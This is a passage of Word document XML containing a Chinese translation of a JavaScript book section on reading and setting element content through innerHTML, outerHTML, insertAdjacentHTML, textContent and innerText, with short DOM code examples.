        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性作为字符串标记返回那个元素的内容。在元素上设置该属性调用了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的解析器，用新字符</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>串内容的解析展现形式替换元素当前内容。（不要管它的名字，除了在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上，</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>也可以在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上使用。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器很擅长解析</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>，通常设置</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>效率非常高，甚至在指定的值需要解析时效率也是相当不错。但注意，对</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性用</w:t>
      </w:r>
      <w:r>
        <w:t>“+=”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符重复追加一小段文本通常效率低下，因为它既要序列化又要解析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>是在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 4</w:t>
      </w:r>
      <w:r>
        <w:t>中引入</w:t>
      </w:r>
      <w:r>
        <w:t>的。虽然所有的浏览器都支持它已经有很长一段时间了，但随着</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的到来它才变得标准化。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>应该在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点以及</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点上工作正常，但这还未被普遍地支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>还标准化了</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。当查询</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>时，返回的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标记的字符串包含被查询元素的开头和结尾标签。当设置元素的</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>时，元素本身被新的内容所替换。只有</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点定义了</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点则无。在写本书的这段时间里，</w:t>
      </w:r>
      <w:r>
        <w:t>outerH</w:t>
      </w:r>
      <w:r>
        <w:t>TML</w:t>
      </w:r>
      <w:r>
        <w:t>在除了</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的所有当前浏览器中都支持。（见本章后面的例</w:t>
      </w:r>
      <w:r>
        <w:t>15-5</w:t>
      </w:r>
      <w:r>
        <w:t>，基于</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>outerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>引入的另一个特性是</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它将在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中标准化，它将任意的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标记字符串插入到指定的元素</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>邻</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的位置。标记是该方法的第二个参数，并且</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相邻</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的精确含义依赖于第一个参数的值。第一个参数为具有以下值之一的字符串：</w:t>
      </w:r>
      <w:r>
        <w:t>"beforebegin"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"afterbegin"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"beforeend"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"afterend"</w:t>
      </w:r>
      <w:r>
        <w:t>。这些值对应的插入点如图</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>5-3</w:t>
      </w:r>
      <w:r>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4028535" cy="668547"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="27" name="00027.jpeg" descr="000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00027.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4028535" cy="668547"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>15-3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML()</w:t>
      </w:r>
      <w:r>
        <w:t>的插入点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>insertAdjacentHTML()</w:t>
      </w:r>
      <w:r>
        <w:t>在当前版本的</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中不支持。本章后面的内容，例</w:t>
      </w:r>
      <w:r>
        <w:t>15-6</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何用</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性实现</w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML()</w:t>
      </w:r>
      <w:r>
        <w:t>，也展示了如何写出不需要一个字符串参数来指定插入点的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>插入方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="371" w:name="15_5_2_Zuo_Wei_Chun_Wen_Ben_De_Yuan_Su_N"/>
      <w:r>
        <w:t>15.5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为纯文本的元素内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时需要查询纯文本形式的元素内容，或者在文档中插入纯文本（不必转义</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标记中使用的尖括号和＆符号）。标准的方法是用</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属性来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var para=document.getElementsByTagName("p")[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>文档中第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=para.textContent;//</w:t>
      </w:r>
      <w:r>
        <w:t>文本是</w:t>
      </w:r>
      <w:r>
        <w:t>"This is a simple document."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>para.textContent="Hello World!";//</w:t>
      </w:r>
      <w:r>
        <w:t>修改段落内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属</w:t>
      </w:r>
      <w:r>
        <w:t>性在除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的所有当前的浏览器中都支持。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:t>属性来代替。微软在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 4</w:t>
      </w:r>
      <w:r>
        <w:t>中引入了</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它在除了</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的所有当前浏览器中都支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:t>属性非常相似，通常可以互相替换使用。不过要小心空元素（在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中字符串</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t>是假值）和未定义的属性之间的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>一个参数，返回元素的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>两个参数，用</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>参数的值设置元素的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>inn</w:t>
      </w:r>
      <w:r>
        <w:t>erText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function textContent(element,value){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var content=element.textContent;//</w:t>
      </w:r>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>是否有定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(value===undefined){//</w:t>
      </w:r>
      <w:r>
        <w:t>没传递</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>，因此返回当前文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(content!==undefined)return content;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return element.innerText;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>传递了</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>，因此设置文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(content!==undefined)element.textContent=value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else element.innerText=value;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textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属性就是将指定元素的所有后代</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点简单地串联在一起。</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:t>没有一个明确指定的行为，但是和</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>有一些不同。</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:t>不返回＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的内容。它忽</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>略多余的空白，并试图保留表格格式。同时，</w:t>
      </w:r>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:t>针对某些表格元素（如＜</w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞）是只</w:t>
      </w:r>
      <w:r>
        <w:t>读的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中的文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>内联的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（也就是那些没有</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的）有一个</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性用来获取它们的文本。浏览器不显示＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的内容，并且</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>解析器忽略脚本中的尖括号和星号。这使得＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素成为应用程序用来嵌入任意文本内容的一个理想的地方。简单地将元素的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为某些值（如</w:t>
      </w:r>
      <w:r>
        <w:t>"text/x-custom-data"</w:t>
      </w:r>
      <w:r>
        <w:t>），就标明了脚本为不可执行的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。如果这样做，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器将忽略该脚本，但该元素将仍然存在于文档树中</w:t>
      </w:r>
      <w:r>
        <w:t>，它的</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性还将返回数据给你。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="15_5_3_Zuo_Wei_TextJie_Dian_De_Yuan_Su_N"/>
      <w:r>
        <w:t>15.5.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的元素内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="372"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一种方法处理元素的内容来是当做一个子节点列表，每个子节点可能有它自己的一组子节点。当考虑元素的内容时，通常感兴趣的是它的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，你也必须准备好处理</w:t>
      </w:r>
      <w:r>
        <w:t>CDATASection</w:t>
      </w:r>
      <w:r>
        <w:t>节点</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它是</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>的子类型，代表了</w:t>
      </w:r>
      <w:r>
        <w:t>CDATA</w:t>
      </w:r>
      <w:r>
        <w:t>段的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-3</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个</w:t>
      </w:r>
      <w:r>
        <w:t>textContent()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它递归地遍历元素的子节点，然后连接后代节点中所有的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的文本。为了理解代</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>码，回想一下</w:t>
      </w:r>
      <w:r>
        <w:t>nodeValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性（定义在</w:t>
      </w:r>
      <w:r>
        <w:t>Nod</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>类型中），它保存</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-3</w:t>
      </w:r>
      <w:r>
        <w:t>：查找元素的后代中节点中的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的纯文本内容，递归进入其子元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该方法的效果类似于</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function textContent(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var child,type,s="";//s</w:t>
      </w:r>
      <w:r>
        <w:t>保存所有子节点的文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(child=e.firstChild;child!=null;child=child.nextSibling){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>type=child.nodeType;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(type===3||type==</w:t>
      </w:r>
      <w:r>
        <w:t>=4)//Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CDATASection</w:t>
      </w:r>
      <w:r>
        <w:t>节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s+=child.nodeValue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(type===1)//</w:t>
      </w:r>
      <w:r>
        <w:t>递归</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s+=textContent(child);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
